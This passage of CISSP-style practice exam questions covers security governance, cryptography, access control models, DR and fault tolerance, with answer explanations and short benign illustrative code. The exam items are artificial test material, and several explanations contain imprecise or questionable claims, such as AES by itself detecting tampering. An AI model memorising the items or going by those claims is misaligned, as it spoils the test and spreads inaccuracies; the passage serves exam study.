The activity that is part of the data analysis phase when conducting a security assessment of access controls is to categorize and identify evidence gathered during the audit. A security assessment of access controls is a process that evaluates the effectiveness and compliance of the access controls implemented in a system or an organization. A security assessment of access controls typically consists of four phases: planning, data collection, data analysis, and reporting. The data analysis phase is the phase where the collected data is processed, interpreted, and evaluated, based on the audit objectives, criteria, and standards. The data analysis phase involves activities such as categorizing and identifying evidence gathered during the audit, which means sorting and labeling the data according to their type, source, and relevance, and verifying their validity, reliability, and sufficiency. Presenting solutions to address audit exceptions, conducting statistical sampling of data transactions, and collecting logs and reports are not activities that are part of the data analysis phase, but of the reporting, data collection, and data collection phases, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 75; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 67.
Why is planning in Disaster Recovery (DR) an interactive process?
It details off-site storage plans
It identifies omissions in the plan
It defines the objectives of the plan
It forms part of the awareness process
Planning in Disaster Recovery (DR) is an interactive process because it identifies omissions in the plan. DR planning is the process of developing and implementing procedures to ensure that an organization can quickly resume its critical functions after a disaster or disruption. It involves steps such as conducting a risk assessment, performing a business impact analysis, defining recovery objectives and strategies, designing and developing the plan, testing and validating it, and maintaining and updating it. The process is interactive because it requires constant feedback and communication among stakeholders, such as management, employees, customers, suppliers, and regulators, and because each review and test of the plan exposes gaps, errors, or changes that must be addressed in the next revision. The other options describe related but different aspects of DR planning. Detailing off-site storage plans means keeping copies of essential data, documents, or equipment at a secure remote location, such as a vault, warehouse, or cloud service; it improves the availability and integrity of those assets and supports recovery, but it is not a feedback mechanism and does not surface omissions in the plan. Defining the objectives of the plan establishes its goals and priorities, such as the recovery time objective (RTO), recovery point objective (RPO), maximum tolerable downtime (MTD), or minimum operating level (MOL); it aligns the plan with business needs and sets its scope, but again does not identify omissions. Forming part of the awareness process means educating stakeholders about the plan's purpose, scope, roles, responsibilities, and procedures; it improves knowledge and preparedness, but it is likewise not the reason the planning process is interactive.
Who is responsible for the protection of information when it is shared with or provided to other organizations?
Systems owner
Authorizing Official (AO)
Information owner
Security officer
The information owner is the person who has the authority and responsibility for the information within an Information System (IS). The information owner is responsible for the protection of information when it is shared with or provided to other organizations, such as by defining the classification, sensitivity, retention, and disposal of the information, as well as by approving or denying the access requests and periodically reviewing the access rights. The system owner, the authorizing official, and the security officer are not responsible for the protection of information when it is shared with or provided to other organizations, although they may have roles and responsibilities related to the security and operation of the IS. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Which of the following is MOST effective in detecting information hiding in Transmission Control Protocol/internet Protocol (TCP/IP) traffic?
Stateful inspection firewall
Application-level firewall
Content-filtering proxy
Packet-filter firewall
An application-level firewall is the most effective in detecting information hiding in TCP/IP traffic. Information hiding is a technique that conceals data or messages within other data or messages, such as using steganography, covert channels, or encryption. An application-level firewall is a type of firewall that operates at the application layer of the OSI model, and inspects the content and context of the network packets, such as the headers, payloads, or protocols. An application-level firewall can help to detect information hiding in TCP/IP traffic, as it can analyze the data for any anomalies, inconsistencies, or violations of the expected format or behavior. A stateful inspection firewall, a content-filtering proxy, and a packet-filter firewall are not as effective in detecting information hiding in TCP/IP traffic, as they operate at lower layers of the OSI model, and only inspect the state, content, or header of the network packets, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 6: Communication and Network Security, page 731; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 4: Communication and Network Security, page 511.
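One heuristic such an inspector might apply, sketched below, is a byte-entropy check: payloads that should be plain text but show near-maximal entropy may carry encrypted or hidden data. The 8.0-bits-per-byte ceiling is a property of bytes; any alert threshold (say 7.5) would be an assumption, not a standard:

```python
# Shannon entropy of a payload as a simple information-hiding heuristic:
# high entropy where plain text is expected suggests encrypted or hidden data.
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

payload = bytes(range(256)) * 4                    # uniform bytes: maximum entropy
print(round(shannon_entropy(payload), 2))          # 8.0
print(round(shannon_entropy(b"hello hello hello"), 2))  # much lower: ordinary text
```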
When determining who can accept the risk associated with a vulnerability, which of the following is the MOST important?
Countermeasure effectiveness
Type of potential loss
Incident likelihood
Information ownership
Information ownership is the most important factor when determining who can accept the risk associated with a vulnerability. Information ownership is the concept that assigns the roles and responsibilities for the creation, maintenance, protection, and disposal of information assets within an organization. Information owners are the individuals or entities who have the authority and accountability for the information assets, and who can make decisions regarding the information lifecycle, classification, access, and usage. Information owners are also responsible for accepting or rejecting the risk associated with the information assets, and for ensuring that the risk is managed and communicated appropriately. Information owners can delegate some of their responsibilities to other roles, such as information custodians, information users, or information stewards, but they cannot delegate their accountability for the information assets and the associated risk. Countermeasure effectiveness, type of potential loss, and incident likelihood are not the most important factors when determining who can accept the risk associated with a vulnerability, although they are relevant or useful factors. Countermeasure effectiveness is the measure of how well a security control reduces or eliminates the risk. Countermeasure effectiveness can help to evaluate the cost-benefit and performance of the security control, and to determine the level of residual risk. Type of potential loss is the measure of the adverse impact or consequence that can result from a risk event. Type of potential loss can include financial, operational, reputational, legal, or strategic losses. Type of potential loss can help to assess the severity and priority of the risk, and to justify the investment and implementation of the security control. Incident likelihood is the measure of the probability or frequency of a risk event occurring. Incident likelihood can be influenced by various factors, such as the threat capability, the vulnerability exposure, the environmental conditions, or the historical data. Incident likelihood can help to estimate the level and trend of the risk, and to select the appropriate risk response and security control.
Which of the following mechanisms will BEST prevent a Cross-Site Request Forgery (CSRF) attack?
Parameterized database queries
Whitelist input values
Synchronized session tokens
Use strong ciphers
The best mechanism to prevent a Cross-Site Request Forgery (CSRF) attack is to use synchronized session tokens. A CSRF attack is a type of web application vulnerability that exploits the trust that a site has in a user’s browser. A CSRF attack occurs when a malicious site, email, or link tricks a user’s browser into sending a forged request to a vulnerable site where the user is already authenticated. The vulnerable site cannot distinguish between legitimate and forged requests, and may perform an unwanted action on behalf of the user, such as changing a password, transferring funds, or deleting data. Synchronized session tokens prevent CSRF attacks by adding a random, unique value to each request; the value is generated by the server and verified by the server before the request is processed. The token is usually stored in a hidden form field or a custom HTTP header and is tied to the user’s session, ensuring that the request originates from the site that issued it rather than from a malicious site. Synchronized session tokens are also known as CSRF tokens, anti-CSRF tokens, or state tokens. Parameterized database queries, whitelist input values, and strong ciphers are not mechanisms to prevent CSRF attacks, although they are useful against other types of web application vulnerabilities. Parameterized database queries prevent SQL injection by using placeholders or parameters for user input instead of concatenating or embedding it directly into the SQL query, so that the input is treated as data and not as part of the SQL command. Whitelist input values prevent input validation attacks by allowing only a predefined set of values or characters for user input, ensuring that the input conforms to the expected format and type. Using strong ciphers defends against attacks on encryption by employing cryptographic algorithms and keys that resist brute force, cryptanalysis, and other attacks, keeping encrypted data confidential, authentic, and integral.
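As an illustration, here is a minimal sketch of how a synchronized token might be issued and checked, assuming a generic server-side session store (the `session` dict and function names are illustrative, not from any particular framework):

```python
# Minimal synchronized (anti-CSRF) token sketch.
import hmac
import secrets

session = {}  # stand-in for a real server-side session store

def issue_csrf_token() -> str:
    token = secrets.token_urlsafe(32)   # unpredictable, per-session value
    session["csrf_token"] = token
    return token                        # embedded in a hidden form field

def verify_csrf_token(submitted: str) -> bool:
    expected = session.get("csrf_token", "")
    # Constant-time comparison avoids leaking the token via timing.
    return hmac.compare_digest(expected, submitted)

form_token = issue_csrf_token()
print(verify_csrf_token(form_token))        # True: request came from our form
print(verify_csrf_token("attacker-guess"))  # False: forged request rejected
```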
Which of the following is a direct monetary cost of a security incident?
Morale
Reputation
Equipment
Information
Equipment is a direct monetary cost of a security incident. A direct monetary cost is a cost that can be easily measured and attributed to a specific security incident, such as the cost of repairing or replacing damaged or stolen equipment, the cost of hiring external experts or consultants, the cost of paying fines or penalties, or the cost of compensating the victims or customers. Equipment is a direct monetary cost of a security incident, as the security incident may cause physical or logical damage to the equipment, such as servers, computers, routers, or firewalls, or may result in the loss or theft of the equipment. The cost of equipment can be calculated by estimating the market value, the depreciation value, or the replacement value of the equipment, as well as the cost of installation, configuration, or integration of the equipment. Morale, reputation, and information are not direct monetary costs of a security incident, although they are important and significant costs. Morale is an indirect or intangible cost of a security incident, as it affects the psychological or emotional state of the employees, customers, or stakeholders, and may lead to lower productivity, satisfaction, or loyalty. Reputation is an indirect or intangible cost of a security incident, as it affects the public perception or image of the organization, and may result in loss of trust, confidence, or credibility. Information is an indirect or intangible cost of a security incident, as it affects the value or quality of the data or knowledge of the organization, and may result in loss of confidentiality, integrity, or availability. Indirect or intangible costs are costs that are difficult to measure or quantify, and may have long-term or hidden impacts on the organization.
Which of the following is a common feature of an Identity as a Service (IDaaS) solution?
Single Sign-On (SSO) authentication support
Privileged user authentication support
Password reset service support
Terminal Access Controller Access Control System (TACACS) authentication support
Single Sign-On (SSO) is a feature that allows a user to authenticate once and access multiple applications or services without having to re-enter their credentials. SSO improves the user experience and reduces the password management burden for both users and administrators. SSO is a common feature of Identity as a Service (IDaaS) solutions, which are cloud-based services that provide identity and access management capabilities to organizations. IDaaS solutions typically support various SSO protocols and standards, such as Security Assertion Markup Language (SAML), OpenID Connect (OIDC), OAuth, and Kerberos, to enable seamless and secure integration with different applications and services, both on-premises and in the cloud.
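To show the token-validation idea at the heart of SSO, here is a minimal sketch using the third-party PyJWT package with a shared secret; a real IDaaS provider would sign with its private key and publish verification keys via JWKS, which is omitted here, and the claim names are illustrative:

```python
# Token validation is the heart of SSO protocols such as OIDC: applications
# trust a signed assertion instead of re-collecting credentials.
import jwt  # pip install PyJWT

SHARED_SECRET = "demo-secret"  # placeholder; a real IdP signs with a private key

# The identity provider issues a signed token after one authentication...
token = jwt.encode({"sub": "alice", "idp": "example-idaas"},
                   SHARED_SECRET, algorithm="HS256")

# ...and every application verifies the signature instead of asking for a password.
claims = jwt.decode(token, SHARED_SECRET, algorithms=["HS256"])
print(claims["sub"])  # alice
```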
Which of the following steps should be performed FIRST when purchasing Commercial Off-The-Shelf (COTS) software?
Undergo a security assessment as part of the authorization process
Establish a risk management strategy
Harden the hosting server, and perform hosting and application vulnerability scans
Establish policies and procedures on system and services acquisition
The first step when purchasing Commercial Off-The-Shelf (COTS) software is to establish policies and procedures on system and services acquisition. This involves defining the objectives, scope, and criteria for acquiring the software, as well as the roles and responsibilities of the stakeholders involved in the acquisition process. The policies and procedures should also address the legal, contractual, and regulatory aspects of the acquisition, such as the terms and conditions, the service level agreements, and the compliance requirements. Undergoing a security assessment, establishing a risk management strategy, and hardening the hosting server are not the first steps when purchasing COTS software, but they may be part of the subsequent steps, such as the evaluation, selection, and implementation of the software. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 64; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 56.
What capability would typically be included in a commercially available software package designed for access control?
Password encryption
File encryption
Source library control
File authentication
Password encryption is a capability that would typically be included in a commercially available software package designed for access control. Password encryption is a technique that transforms the plain text passwords into unreadable ciphertexts, using a cryptographic algorithm and a key. Password encryption can help to protect the passwords from unauthorized access, disclosure, or modification, as well as to prevent password cracking or guessing attacks. File encryption, source library control, and file authentication are not capabilities related to access control, but to data protection, configuration management, and data integrity, respectively. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 5: Security Engineering, page 605; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 3: Security Architecture and Engineering, page 386.
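Worth noting: although the option says "password encryption", modern access control software typically stores salted one-way hashes rather than reversible ciphertext. A minimal sketch with Python's standard library follows; the iteration count is illustrative:

```python
# Salted one-way password hashing with PBKDF2 from the standard library.
import hashlib
import hmac
import os

def hash_password(password: str, salt: bytes | None = None) -> tuple[bytes, bytes]:
    salt = salt or os.urandom(16)  # unique salt defeats precomputed tables
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, stored)  # constant-time comparison

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))  # True
print(verify_password("wrong guess", salt, stored))                   # False
```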
Which of the following is the MOST important part of an awareness and training plan to prepare employees for emergency situations?
Having emergency contacts established for the general employee population to get information
Conducting business continuity and disaster recovery training for those who have a direct role in the recovery
Designing business continuity and disaster recovery training programs for different audiences
Publishing a corporate business continuity and disaster recovery plan on the corporate website
The most important part of an awareness and training plan to prepare employees for emergency situations is to design business continuity and disaster recovery training programs for different audiences. This means that the training content, format, frequency, and delivery methods should be tailored to the specific needs, roles, and responsibilities of the target audience, such as senior management, business unit managers, IT staff, recovery team members, or general employees. Different audiences may have different levels of awareness, knowledge, skills, and involvement in the business continuity and disaster recovery processes, and therefore require different types of training to ensure they are adequately prepared and informed. Designing business continuity and disaster recovery training programs for different audiences can help to increase the effectiveness, efficiency, and consistency of the training, as well as the engagement, motivation, and retention of the learners. Having emergency contacts established for the general employee population to get information, conducting business continuity and disaster recovery training for those who have a direct role in the recovery, and publishing a corporate business continuity and disaster recovery plan on the corporate website are all important parts of an awareness and training plan, but they are not as important as designing business continuity and disaster recovery training programs for different audiences. Having emergency contacts established for the general employee population to get information can help to provide timely and accurate communication and guidance during an emergency situation, but it does not necessarily prepare the employees for their roles and responsibilities before, during, and after the emergency. Conducting business continuity and disaster recovery training for those who have a direct role in the recovery can help to ensure that they are competent and confident to perform their tasks and duties in the event of a disruption, but it does not address the needs and expectations of other audiences who may also be affected by or involved in the business continuity and disaster recovery processes. Publishing a corporate business continuity and disaster recovery plan on the corporate website can help to make the plan accessible and transparent to the stakeholders, but it does not guarantee that the plan is understood, followed, or updated by the employees.
Which of the following is MOST appropriate for protecting the confidentiality of data stored on a hard drive?
Triple Data Encryption Standard (3DES)
Advanced Encryption Standard (AES)
Message Digest 5 (MD5)
Secure Hash Algorithm 2 (SHA-2)
The most appropriate method for protecting the confidentiality of data stored on a hard drive is to use the Advanced Encryption Standard (AES). AES is a symmetric encryption algorithm that uses the same key to encrypt and decrypt data. AES can provide strong and efficient encryption for data at rest, as it uses a block cipher that operates on fixed-size blocks of data, and it supports various key sizes, such as 128, 192, or 256 bits. AES can protect the confidentiality of data stored on a hard drive by transforming the data into an unreadable form that can only be accessed by authorized parties who possess the correct key. AES can also provide some degree of integrity and authentication, as it can detect any modification or tampering of the encrypted data. Triple Data Encryption Standard (3DES), Message Digest 5 (MD5), and Secure Hash Algorithm 2 (SHA-2) are not the most appropriate methods for protecting the confidentiality of data stored on a hard drive, although they may be related or useful cryptographic techniques. 3DES is a symmetric encryption algorithm that uses three iterations of the Data Encryption Standard (DES) algorithm with two or three different keys to encrypt and decrypt data. 3DES can provide encryption for data at rest, but it is not as strong or efficient as AES, as it uses a smaller key size (56 bits per iteration), and it is slower and more complex than AES. MD5 is a hash function that produces a fixed-length output (128 bits) from a variable-length input. MD5 does not provide encryption for data at rest, as it does not use any key to transform the data, and it cannot be reversed to recover the original data. MD5 can provide some integrity for data at rest, as it can verify if the data has been changed or corrupted, but it is not secure or reliable, as it is vulnerable to collisions and pre-image attacks. SHA-2 is a hash function that produces a fixed-length output (224, 256, 384, or 512 bits) from a variable-length input. SHA-2 does not provide encryption for data at rest, as it does not use any key to transform the data, and it cannot be reversed to recover the original data. SHA-2 can provide integrity for data at rest, as it can verify if the data has been changed or corrupted, and it is more secure and reliable than MD5, as it is resistant to collisions and pre-image attacks.
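A minimal sketch of AES protecting data at rest, using the third-party cryptography package's AES-GCM mode (which adds the integrity check mentioned above); the sample plaintext is illustrative:

```python
# AES-GCM for data at rest: confidentiality plus tamper detection.
# pip install cryptography
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)  # 256-bit AES key
aesgcm = AESGCM(key)

nonce = os.urandom(12)                     # must be unique per encryption with this key
ciphertext = aesgcm.encrypt(nonce, b"payroll.db contents", None)

# Decryption raises an exception if the ciphertext was modified.
print(aesgcm.decrypt(nonce, ciphertext, None))  # b'payroll.db contents'
```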
Which of the following would an attacker BEST be able to accomplish through the use of Remote Access Tools (RAT)?
Reduce the probability of identification
Detect further compromise of the target
Destabilize the operation of the host
Maintain and expand control
Remote Access Tools (RAT) are malicious software that allow an attacker to remotely access and control a compromised host, often without the user’s knowledge or consent. RATs can be used to perform various malicious activities, such as stealing data, installing backdoors, executing commands, spying on the user, or spreading to other hosts. One of the main objectives of RATs is to maintain and expand control over the target network, by evading detection, hiding their presence, and creating persistence mechanisms.
Which one of the following data integrity models assumes a lattice of integrity levels?
Take-Grant
Biba
Harrison-Ruzzo
Bell-LaPadula
The Biba model is a data integrity model that assumes a lattice of integrity levels, where each subject and object is assigned a fixed integrity level. The model enforces two rules: the simple integrity property and the *-integrity property. The simple integrity property states that a subject may only read an object at an equal or higher integrity level (no read down). The *-integrity property states that a subject may only write to an object at an equal or lower integrity level (no write up). Together, these rules prevent high-integrity data from being contaminated by lower-integrity sources. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition, page 316; CISSP For Dummies, 7th Edition, page 113.
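The two rules can be expressed as a small lattice check; the sketch below assumes integer integrity levels where a larger number means higher integrity:

```python
# Toy Biba lattice check. Levels are integers; larger = higher integrity.

def can_read(subject_level: int, object_level: int) -> bool:
    # Simple integrity property ("no read down"): read only from equal or
    # higher integrity, so low-integrity data cannot contaminate the subject.
    return object_level >= subject_level

def can_write(subject_level: int, object_level: int) -> bool:
    # *-integrity property ("no write up"): write only to equal or lower
    # integrity, so the subject cannot corrupt more trusted data.
    return object_level <= subject_level

print(can_read(subject_level=2, object_level=3))   # True: reading up is allowed
print(can_read(subject_level=2, object_level=1))   # False: no read down
print(can_write(subject_level=2, object_level=1))  # True: writing down is allowed
print(can_write(subject_level=2, object_level=3))  # False: no write up
```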
Who is accountable for the information within an Information System (IS)?
Security manager
System owner
Data owner
Data processor
The data owner is the person who has the authority and responsibility for the information within an Information System (IS). The data owner is accountable for the security, quality, and integrity of the data, as well as for defining the classification, sensitivity, retention, and disposal of the data. The data owner must also approve or deny the access requests and periodically review the access rights. The security manager, the system owner, and the data processor are not accountable for the information within an IS, but they may have roles and responsibilities related to the security and operation of the IS. References: CISSP All-in-One Exam Guide, Eighth Edition, Chapter 1: Security and Risk Management, page 48; Official (ISC)2 Guide to the CISSP CBK, Fifth Edition, Chapter 1: Security and Risk Management, page 40.
Which of the following is the MOST effective practice in managing user accounts when an employee is terminated?
Implement processes for automated removal of access for terminated employees.
Delete employee network and system IDs upon termination.
Manually remove terminated employee user-access to all systems and applications.
Disable terminated employee network ID to remove all access.
The most effective practice in managing user accounts when an employee is terminated is to implement processes for automated removal of access for terminated employees. This practice can ensure that the access rights of the terminated employee are revoked as soon as possible, preventing any unauthorized or malicious use of the account. Automated removal of access can be achieved by using software tools or scripts that can disable or delete the account, remove it from any groups or roles, and revoke any permissions or privileges associated with the account. Automated removal of access can also reduce the human errors or delays that may occur in manual processes, and provide an audit trail of the actions taken. Deleting employee network and system IDs upon termination, manually removing terminated employee user-access to all systems and applications, and disabling terminated employee network ID to remove all access are all possible ways to manage user accounts when an employee is terminated, but they are not as effective as automated removal of access. Deleting employee network and system IDs upon termination may cause problems with data retention, backup, or recovery, and may not remove all traces of the account from the systems. Manually removing terminated employee user-access to all systems and applications may be time-consuming, error-prone, or incomplete, and may depend on the cooperation and coordination of different administrators or departments. Disabling terminated employee network ID to remove all access may not be sufficient, as the account may still exist and be reactivated, or may have access to some resources that are not controlled by the network ID.
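A conceptual sketch of such automation follows; the HR feed structure and the disable_account helper are hypothetical stand-ins for a real HR export and directory API (for example, disabling an account in LDAP or Active Directory):

```python
# Conceptual automated deprovisioning driven by an HR termination feed.
import datetime

hr_feed = [  # stand-in for a real HR system export
    {"user": "jdoe", "status": "terminated"},
    {"user": "asmith", "status": "active"},
]

audit_log = []

def disable_account(username: str) -> None:
    # Placeholder for a real directory call (e.g., LDAP/AD account disable).
    timestamp = datetime.datetime.now(datetime.timezone.utc).isoformat()
    audit_log.append((username, timestamp))

for record in hr_feed:
    if record["status"] == "terminated":
        # Disable rather than delete, preserving data for audit and forensics.
        disable_account(record["user"])

print(audit_log)  # audit trail of automated actions
```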
Which security model is MOST commonly used in a commercial environment because it protects the integrity of financial and accounting data?
Biba
Graham-Denning
Clark-Wilson
Bell-LaPadula
The security model most commonly used in a commercial environment because it protects the integrity of financial and accounting data is Clark-Wilson. Clark-Wilson focuses on the integrity of data and transactions and is designed to prevent unauthorized or improper modification or tampering. It rests on two key concepts: separation of duties, which assigns different steps of a transaction or process to different parties so that no single party can complete it alone, and well-formed transactions, which require that every operation on data be consistent, complete, and verifiable, preserving the validity of the data from one state to the next. These properties make Clark-Wilson a natural fit for commercial systems: financial and accounting data are critical and sensitive to business operations, must remain accurate and present a true and fair view of the organization's financial position, and must be protected against fraud or error such as embezzlement, falsification, or manipulation, which could cause financial losses or legal liabilities. Well-formed, verifiable transactions also directly support audit and compliance activities. Biba is also an integrity model, but it enforces integrity through read and write rules across integrity levels rather than through separation of duties and well-formed transactions, so it is better suited to military and government settings than to commercial transaction processing. Graham-Denning is a model concerned with the secure creation, deletion, and transfer of rights among subjects and objects, not specifically with transaction integrity. Bell-LaPadula is a confidentiality model, enforcing no read up and no write down, and does not address integrity at all.
What is the MAIN purpose of a change management policy?
To assure management that changes to the Information Technology (IT) infrastructure are necessary
To identify the changes that may be made to the Information Technology (IT) infrastructure
To verify that changes to the Information Technology (IT) infrastructure are approved
To determine the necessity of implementing modifications to the Information Technology (IT) infrastructure
The main purpose of a change management policy is to ensure that all changes made to the IT infrastructure are approved, documented, and communicated effectively across the organization. This helps to minimize the risks associated with unauthorized or poorly planned changes, such as security breaches, system failures, or compliance issues. A change management policy does not assure management that changes are necessary, identify the changes that may be made, or determine the necessity of implementing modifications, although these may be part of the change management process. References: Official (ISC)2 CISSP CBK Reference, Fifth Edition.
Which of the following is part of a Trusted Platform Module (TPM)?
A non-volatile tamper-resistant storage for storing both data and signing keys in a secure fashion
A protected Pre-Basic Input/Output System (BIOS) which specifies a method or a metric for “measuring” the state of a computing platform
A secure processor targeted at managing digital keys and accelerating digital signing
A platform-independent software interface for accessing computer functions
A Trusted Platform Module (TPM) is a secure processor targeted at managing digital keys and accelerating digital signing. A TPM is a cryptoprocessor chip that is embedded on a motherboard or a device, and that provides a secure and trustworthy environment for the execution and the storage of cryptographic operations and keys. A TPM can provide some benefits for security, such as enhancing the confidentiality and integrity of the data and the code, preventing unauthorized modifications or tampering, and enabling remote attestation or verification. A TPM can perform various functions, such as generating and storing cryptographic keys, producing random numbers, sealing and binding data to a particular platform state, recording platform integrity measurements in Platform Configuration Registers (PCRs), and supporting remote attestation.
A non-volatile tamper-resistant storage for storing both data and signing keys in a secure fashion, a protected Pre-Basic Input/Output System (BIOS) which specifies a method or a metric for “measuring” the state of a computing platform, and a platform-independent software interface for accessing computer functions are not part of a TPM, although they may be related or useful concepts or techniques. A non-volatile tamper-resistant storage for storing both data and signing keys in a secure fashion is a feature or a component of a TPM, but it is not the whole TPM. A non-volatile tamper-resistant storage is a type of memory or device that can retain the data and the keys even when the power is off, and that can resist physical or logical attacks or modifications. A non-volatile tamper-resistant storage can provide some benefits for security, such as enhancing the availability and the integrity of the data and the keys, preventing data loss or corruption, and facilitating the recovery and the restoration process. A protected Pre-Basic Input/Output System (BIOS) which specifies a method or a metric for “measuring” the state of a computing platform is a function or a result of a TPM, but it is not the whole TPM. A protected Pre-Basic Input/Output System (BIOS) is a firmware or a software that is responsible for initializing and testing the hardware and software components of a system or a device, and for loading and executing the operating system. A protected Pre-Basic Input/Output System (BIOS) can provide some benefits for security, such as enhancing the performance and the functionality of the system or the device, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. A platform-independent software interface for accessing computer functions is a concept or a technique that is related to a TPM, but it is not the whole TPM. A platform-independent software interface is a software component or a layer that allows a user or an application to access and use the functions or the features of a computer system or a device, regardless of the type or the nature of the system or the device, such as the hardware, the software, or the operating system. A platform-independent software interface can provide some benefits for security, such as enhancing the usability and the interoperability of the system or the device, supporting the encryption and the authentication mechanisms, and enabling the segmentation and isolation of the system or the device.
What does electronic vaulting accomplish?
It protects critical files.
It ensures the fault tolerance of Redundant Array of Independent Disks (RAID) systems
It stripes all database records
It automates the Disaster Recovery Process (DRP)
Electronic vaulting protects critical files. It is a backup technique that periodically transmits copies of critical data in batches over a network to a secure off-site storage facility, so that current copies survive a disaster at the primary site. It does not ensure the fault tolerance of RAID systems, stripe database records, or automate the Disaster Recovery Process (DRP), although the off-site copies it maintains support the organization's recovery objectives.
Which of the following MUST be in place to recognize a system attack?
Stateful firewall
Distributed antivirus
Log analysis
Passive honeypot
Log analysis is the most essential method to recognize a system attack. Log analysis is the process of collecting, reviewing, and interpreting the records of events and activities that occur on a system or a network. Logs can provide valuable information and evidence about the source, nature, and impact of an attack, as well as the actions and responses of the system or the network. Log analysis can help to detect and analyze anomalies, patterns, trends, and indicators of compromise, as well as to identify and correlate the root cause, scope, and severity of an attack. Log analysis can also help to support incident response, forensic investigation, audit, and compliance activities. Log analysis requires the use of appropriate tools, techniques, and procedures, as well as the implementation of effective log management practices, such as log generation, collection, storage, retention, protection, and disposal. Stateful firewall, distributed antivirus, and passive honeypot are not the methods that must be in place to recognize a system attack, although they may be related or useful techniques. Stateful firewall is a type of network security device that monitors and controls the incoming and outgoing network traffic based on the state, context, and rules of the network connections. Stateful firewall can help to prevent or mitigate some types of attacks, such as denial-of-service, spoofing, or port scanning, by filtering or blocking the packets that do not match the established or expected state of the connection. However, stateful firewall is not sufficient to recognize a system attack, as it may not be able to detect or analyze the attacks that bypass or exploit the firewall rules, such as application-layer attacks, encryption-based attacks, or insider attacks. Distributed antivirus is a type of malware protection solution that uses a centralized server and multiple agents or clients to scan, detect, and remove malware from the systems or the network. Distributed antivirus can help to prevent or mitigate some types of attacks, such as viruses, worms, or ransomware, by updating and applying the malware signatures, heuristics, or behavioral analysis to the systems or the network. However, distributed antivirus is not sufficient to recognize a system attack, as it may not be able to detect or analyze the attacks that evade or disable the antivirus solution, such as zero-day attacks, polymorphic malware, or rootkits. Passive honeypot is a type of decoy system or network that mimics the real system or network and attracts the attackers to interact with it, while monitoring and recording their activities. Passive honeypot can help to divert or distract some types of attacks, such as reconnaissance, scanning, or probing, by providing false or misleading information to the attackers, while collecting valuable intelligence about their techniques, tools, or motives. However, passive honeypot is not sufficient to recognize a system attack, as it may not be able to detect or analyze the attacks that target the real system or network, or that avoid or identify the honeypot.
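A minimal log-analysis sketch: the snippet below counts failed SSH logins per source address and flags likely brute-force activity; the log lines and the threshold are illustrative:

```python
# Count failed SSH logins per source IP and flag likely brute-force attempts.
import re
from collections import Counter

THRESHOLD = 3  # illustrative alert threshold
pattern = re.compile(r"Failed password for .* from (\d+\.\d+\.\d+\.\d+)")

log_lines = [
    "May  1 10:00:01 host sshd[1]: Failed password for root from 203.0.113.9 port 4242 ssh2",
    "May  1 10:00:02 host sshd[1]: Failed password for root from 203.0.113.9 port 4243 ssh2",
    "May  1 10:00:03 host sshd[1]: Failed password for admin from 203.0.113.9 port 4244 ssh2",
    "May  1 10:05:00 host sshd[1]: Accepted password for alice from 198.51.100.7 port 50000 ssh2",
]

failures = Counter(m.group(1) for line in log_lines if (m := pattern.search(line)))
for ip, count in failures.items():
    if count >= THRESHOLD:
        print(f"possible brute force from {ip}: {count} failures")
```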
What is the PRIMARY goal of fault tolerance?
Elimination of single point of failure
Isolation using a sandbox
Single point of repair
Containment to prevent propagation
The primary goal of fault tolerance is to eliminate single points of failure, where a single point of failure is any component or resource that is essential to the operation or functionality of a system or network and whose failure would cause the entire system or network to fail or malfunction. Fault tolerance is the ability of a system or network to suffer a fault but continue to operate, by adding redundant or backup components or resources that can take over for or replace a failed component without affecting the performance or quality of the system or network. Fault tolerance can provide some benefits for security, such as enhancing the availability and reliability of the system or network, preventing or mitigating some types of attacks or vulnerabilities, and supporting audit and compliance activities. Fault tolerance can be implemented using various methods or techniques, such as redundant hardware components, disk arrays (RAID), server clustering, failover and load balancing, and redundant network links and power supplies; a minimal failover sketch appears after the discussion of the other options below.
Isolation using a sandbox, single point of repair, and containment to prevent propagation are not the primary goals of fault tolerance, although they may be related or possible outcomes or benefits of fault tolerance. Isolation using a sandbox is a security concept or technique that involves executing or testing a program or a code in a separate or a restricted environment, such as a virtual machine or a container, to protect the system or the network from any potential harm or damage that the program or the code may cause, such as malware, viruses, worms, or trojans. Isolation using a sandbox can provide some benefits for security, such as enhancing the confidentiality and the integrity of the system or the network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. However, isolation using a sandbox is not the primary goal of fault tolerance, as it is not a method or a technique of adding redundant or backup components or resources to the system or the network, and it does not address the availability or the reliability of the system or the network. Single point of repair is a security concept or technique that involves identifying or locating the component or the resource that is responsible for the failure or the malfunction of the system or the network, and that can restore or recover the system or the network if it is repaired or replaced, such as a disk, a server, or a router. Single point of repair can provide some benefits for security, such as enhancing the availability and the reliability of the system or the network, preventing or mitigating some types of attacks or vulnerabilities, and supporting the audit and the compliance activities. However, single point of repair is not the primary goal of fault tolerance, as it is not a method or a technique of adding redundant or backup components or resources to the system or the network, and it does not prevent or eliminate the failure or the malfunction of the system or the network. Containment to prevent propagation is a security concept or technique that involves isolating or restricting the component or the resource that is affected or infected by a fault or an attack, such as a malware, a virus, a worm, or a trojan, to prevent or mitigate the spread or the transmission of the fault or the attack to other components or resources of the system or the network, such as by disconnecting, disabling, or quarantining the component or the resource. Containment to prevent propagation can provide some benefits for security, 